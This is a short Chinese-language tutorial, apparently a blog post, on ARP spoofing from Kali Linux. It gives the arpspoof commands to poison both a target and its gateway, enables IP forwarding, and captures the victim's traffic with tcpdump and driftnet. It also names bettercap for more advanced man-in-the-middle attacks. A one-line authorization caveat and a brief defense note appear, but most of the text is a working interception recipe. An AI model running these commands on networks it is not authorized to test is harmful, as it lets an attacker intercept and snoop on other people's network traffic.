kali arp欺骗

ARP欺骗(ARP Spoofing)的核心是伪造网关与目标设备的MAC地址映射,让流量经过你的Kali主机。请务必仅在自有网络或获得书面授权的环境中测试。

以下是使用 arpspoof(最简单)的标准步骤:

  1. 开启IP转发(让目标能正常上网,避免断网)

```bash

echo 1 > /proc/sys/net/ipv4/ip_forward

```

  1. 执行欺骗(需要两个终端窗口)

· 窗口1 - 欺骗目标(告诉目标:我是网关)

```bash

sudo arpspoof -i 网卡名 -t 目标IP 网关IP

```

· 窗口2 - 欺骗网关(告诉网关:我是目标)

```bash

sudo arpspoof -i 网卡名 -t 网关IP 目标IP

```

常用参数替换:-i eth0(你的网卡),-t 192.168.1.100(受害者),192.168.1.1(网关)。

  1. 验证与抓包

· 查看流量:sudo tcpdump -i eth0 host 目标IP

· 用 driftnet 抓图片,或 bettercap 进行更高级的中间人攻击。

停止欺骗:Ctrl+C 结束两个窗口,系统约30秒后自动恢复ARP表。或执行 ip link set arp off/on 快速重置。

现代防御:HTTPS加密网站(如银行、支付宝)只能抓到乱码,无法获取密码。开启ARP防火墙或使用静态ARP表可防御。

相关推荐
每天一把堆栈2 小时前
pctf-pwn(2025)
网络安全·pwn
菩提小狗3 小时前
每日安全情报报告 · 2026-04-10
网络安全·漏洞·cve·安全情报·每日安全
JS_SWKJ3 小时前
网闸核心技术详解:数据“安全渡河”的物理密码
网络安全
网安情报局4 小时前
RSAC 2026深度解析:AI对抗AI成主流,九大安全能力全面升级
人工智能·网络安全
云安全助手5 小时前
OpenClaw安全深度解析:开放生态下的AI智能体风险与防护实战
人工智能·网络安全
乾元6 小时前
《硅基之盾》番外篇一:时间的折叠——AI 时代下的物理隔离与传统工控(ICS/OT)安全
网络·人工智能·安全·网络安全·架构
千枫s6 小时前
kali怎么制作所有长度的爆破字典
网络·网络安全
AI_Claude_code6 小时前
ZLibrary访问困境方案二:DNS-over-HTTPS/TLS配置与隐私保护实践
爬虫·python·网络协议·http·网络安全·https·网络爬虫
pencek6 小时前
HakcMyVM-Nebula
网络安全